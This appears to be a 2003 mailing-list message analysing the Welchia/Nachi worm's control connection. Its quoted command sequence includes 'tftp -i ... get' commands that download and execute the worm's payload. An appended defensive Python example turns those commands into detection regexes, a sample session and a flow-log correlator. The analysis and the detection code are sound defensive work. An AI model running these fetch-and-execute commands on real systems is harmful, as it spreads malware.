Message-ID: <200308201715.TAA30389@fire.malware.de>
From: malware at t-online.de (Michael Mueller)
Subject: W32/Welchia, W32/Nachi backdoor?

Hi Barry,

you wrote:
> > creates a backdoor listening on TCP/707 or some other randomly chosen port
> > between TCP/666 and TCP/765 [2]
> 
> Telnetting to this port seems to disconnect after 1-5 characters have been
> entered?  This doesn't look like TFTP (port 65/tcp&UDP), and the windows
> tftp client doesn't seem to offer any means of specifying a port to connect
> to?

Mhh, I wouldn't call it a backdoor. 

The client to infect opens the connection with the stdin/-out of CMD.EXE
connected to the socket. Once the connection is established the listener
is waiting for the prompt printed by CMD.EXE and starts giving commands.
These commands look like following:

dir wins\dllhost.exe
dir dllcache\tftpd.exe
tftp -i x.x.x.x get svchost.exe wins\SVCHOST.EXE
tftp -i x.x.x.x get dllhost.exe wins\DLLHOST.EXE
wins\DLLHOST.EXE

If you want to use this socket connection as a backdoor to the server, you
have to find a buffer overflow or similar in the worm code.


Michael

-- 
Linux@...Xpress
http://www-users.rwth-aachen.de/Michael.Mueller4/tekxp/tekxp.html
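The command sequence and port range described above lend themselves to detection on the wire. The following is an added example, not part of Michael's post or of any tool it mentions: it recognises the worm's command exchange in a reconstructed TCP session payload and flags flow-log entries where a TCP connection to a port in the 666-765 range is followed by a TFTP (UDP/69) transfer between the same two hosts. The regular expressions are derived from the five commands shown in the post; the flow-log format, the IP addresses and the sample session are constructed for the example and are assumptions, not captured data.

```python
"""Detection helpers for the Welchia/Nachi command channel described in the post."""
import re
from typing import Dict, List

# Port range named in the quoted text: TCP/666 through TCP/765.
CONTROL_PORT_MIN = 666
CONTROL_PORT_MAX = 765

# Command shapes taken from the session transcript in the post. The TFTP server
# address and file names are captured as wildcards; the staging directory wins\ is fixed.
COMMAND_PATTERNS = {
    "probe_dllhost": re.compile(r"^dir\s+wins\\dllhost\.exe\s*$", re.I),
    "probe_tftpd": re.compile(r"^dir\s+dllcache\\tftpd\.exe\s*$", re.I),
    "tftp_get": re.compile(
        r"^tftp\s+-i\s+(\d{1,3}(?:\.\d{1,3}){3})\s+get\s+(\S+)\s+wins\\(\S+)\s*$", re.I
    ),
    "exec_dllhost": re.compile(r"^wins\\dllhost\.exe\s*$", re.I),
}


def is_control_port(port: int) -> bool:
    """True if the port falls in the range the worm chooses its listener from."""
    return CONTROL_PORT_MIN <= port <= CONTROL_PORT_MAX


def classify_session(payload: str) -> Dict[str, object]:
    """Score a reconstructed session payload (the text sent to the CMD.EXE prompt).

    Returns which stages of the command sequence were seen, in order, and the
    TFTP servers named in any 'tftp -i ... get' command. A single 'dir' is too
    common to act on, so two or more distinct stages are required for a match.
    """
    stages: List[str] = []
    tftp_servers = set()
    for raw in payload.splitlines():
        line = raw.strip()
        for name, pattern in COMMAND_PATTERNS.items():
            m = pattern.match(line)
            if m:
                stages.append(name)
                if name == "tftp_get":
                    tftp_servers.add(m.group(1))
    return {
        "match": len(set(stages)) >= 2,
        "stages": stages,
        "tftp_servers": sorted(tftp_servers),
    }


# Assumed flow-log line format (constructed for this example):
#   <timestamp> proto=<tcp|udp> src=<ip>:<port> dst=<ip>:<port>
FLOW_RE = re.compile(
    r"proto=(?P<proto>tcp|udp)\s+src=(?P<src>[\d.]+):(?P<sport>\d+)\s+dst=(?P<dst>[\d.]+):(?P<dport>\d+)"
)


def scan_flow_log(lines: List[str]) -> List[Dict[str, str]]:
    """Flag host pairs that had a TCP flow to a 666-765 port and then a UDP/69 flow.

    The pairing is direction-agnostic: in the post's description the host that
    accepted the control connection is the one that later fetches files by TFTP.
    """
    control_pairs = set()
    hits: List[Dict[str, str]] = []
    for line in lines:
        m = FLOW_RE.search(line)
        if not m:
            continue
        src, dst = m.group("src"), m.group("dst")
        dport = int(m.group("dport"))
        pair = frozenset((src, dst))
        if m.group("proto") == "tcp" and is_control_port(dport):
            control_pairs.add(pair)
        elif m.group("proto") == "udp" and dport == 69 and pair in control_pairs:
            hits.append({"tftp_client": src, "tftp_server": dst, "line": line.strip()})
    return hits


# Constructed sample data: a control connection from 10.0.0.7 to 10.0.0.9:707,
# followed by 10.0.0.9 pulling files from 10.0.0.7 over TFTP; the 10.0.0.5/10.0.0.8
# pair is an ordinary web request plus an unrelated TFTP transfer.
SAMPLE_FLOWS = [
    "2003-08-20T17:15:01 proto=tcp src=10.0.0.7:3456 dst=10.0.0.9:707",
    "2003-08-20T17:15:02 proto=udp src=10.0.0.9:1031 dst=10.0.0.7:69",
    "2003-08-20T17:15:03 proto=tcp src=10.0.0.5:3457 dst=10.0.0.8:80",
    "2003-08-20T17:15:04 proto=udp src=10.0.0.5:1032 dst=10.0.0.8:69",
]

SAMPLE_SESSION = (
    "dir wins\\dllhost.exe\r\n"
    "dir dllcache\\tftpd.exe\r\n"
    "tftp -i 10.0.0.7 get svchost.exe wins\\SVCHOST.EXE\r\n"
    "tftp -i 10.0.0.7 get dllhost.exe wins\\DLLHOST.EXE\r\n"
    "wins\\DLLHOST.EXE\r\n"
)

if __name__ == "__main__":
    print(classify_session(SAMPLE_SESSION))
    print(scan_flow_log(SAMPLE_FLOWS))
```

The session classifier is the more reliable signal, since the port range alone overlaps with legitimate services and the flow correlation only narrows it to pairs that also exchanged TFTP traffic; in practice the two would be combined so that a flagged flow pair prompts inspection of the captured session for the command sequence.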

